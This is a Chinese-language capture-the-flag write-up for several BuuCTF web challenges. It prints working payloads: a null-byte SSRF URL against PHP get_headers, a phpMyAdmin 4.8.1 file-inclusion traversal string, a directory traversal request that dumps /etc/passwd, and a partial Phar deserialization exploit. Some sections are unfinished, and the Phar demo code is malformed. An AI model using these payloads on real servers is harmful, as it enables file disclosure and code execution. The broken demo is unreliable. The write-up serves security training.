BuuCTF Web Writeup 第三部分
Posted 0d4y
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BuuCTF Web Writeup 第三部分相关的知识,希望对你有一定的参考价值。
[GKCTF2020]cve版签到
题目提示
cve-2020-7066
Hint: Flag in localhost
Tips: Host must be end with ‘123‘
You just view *.ctfhub.com
题目原型
#79329 get_headers() silently truncates after a null byte
This was tested on php 7.3, but the function has always had this bug.
The test script shows that this can cause well-written scripts to get headers for an unexpected domain. Those headers could leak sensitive information or unexpectedly contain attacker-controlled data.
解题方法
?url=http://127.0.0.123%00.ctfhub.com
收集信息
善用php bug搜索漏洞
(未完成)[安洵杯 2019]easy_web
[GWCTF 2019]我有一个数据库
解题方法
扫描后发现存在/phpmyadmin/
,访问后得知版本信息 4.8.1
phpmyadmin 4.8.1存在文件包含漏洞,构造?target=db_datadict.php%253f/../../../../../../../../../flag
(未完成)[BJDCTF2020]Mark loves cat
(未完成)[CISCN2019 华北赛区 Day1 Web1]Dropbox
上传测试后发现只能上传图片类型文件
抓包
POST /download.php HTTP/1.1
...
Cookie: PHPSESSID=94b78b93ffa19e6bc6d07e0da5307548
Connection: keep-alive
Upgrade-Insecure-Requests: 1
filename=%E5%9B%BE%E7%89%87%E9%A9%AC.png
放包之后会显示文件内容
目录穿越
filename=../../../../../etc/passwd
显示结果
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
...
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
题目中的主要文件
.
├── class.php
├── delete.php
├── download.php
├── index.php
├── login.php
└── register.php
class.php
是核心文件
class.php(简化)
<?php
class User {
public $db;
public function __destruct() {
$this->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}
public function __destruct() {
...
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function close() {
return file_get_contents($this->filename);
}
}
?>
File
类中的close()
方法存在RCE vulnerability
Q: 如何利用RCE vulnerability?
代码中并不 unserialize()
,但存在文件上传点
Attack PHP Deserialization Vulnerability via Phar
the Phar File Structure
0x00 A Stub
It can be interpreted as a flag and the format is
xxx<?php xxx; __HALT_COMPILER();?>
.The front content is not limited, but it must end with__HALT_COMPILER();?>
, otherwise the phar extension will not recognize this file as a phar file.
0x01 A Manitest Describing the Contents
A phar file is essentially a compressed file, in which the permissions, attributes and other information of each compressed file are included. This section also stores user-defined meta-data in serialized form, which is the core of the above attacks.
0x02 The File Contents
It is the contents of compressed file.
0x03 A signature for verifying Phar integrity
phar file format only
Demo
Construct a phar file according to the file structure, and PHP has a built-in class to handle related operations
Set the phar.readonly
option in php.ini
to Off
, otherwise the phar file cannot be generated.
class Demo {
@unlink("phar.phar");
$phar = new Phar("phar.phar"); // suffix must be phar
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise as gif
$o = new file();
$o->output = "phpinfo();";
$phar->setMetadata($o); // store custom meta-data in manifest
$phar->addFromString("test.txt", "test"); // compressed file
$phar->stopBuffering(); // automatic computation of signature
};
以上是关于BuuCTF Web Writeup 第三部分的主要内容,如果未能解决你的问题,请参考以下文章